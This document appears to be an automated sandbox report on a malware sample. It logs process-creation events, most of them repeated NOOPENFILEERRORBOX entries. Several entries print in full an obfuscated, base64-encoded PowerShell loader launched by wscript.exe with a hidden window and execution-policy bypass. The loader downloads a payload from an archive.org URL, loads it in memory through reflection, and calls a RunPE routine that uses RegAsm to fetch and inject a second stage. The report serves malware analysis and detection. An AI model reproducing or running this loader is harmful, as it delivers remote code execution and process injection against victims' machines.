'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B386BC0 push ss; retf 4_2_00007FFB4B386BC7
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
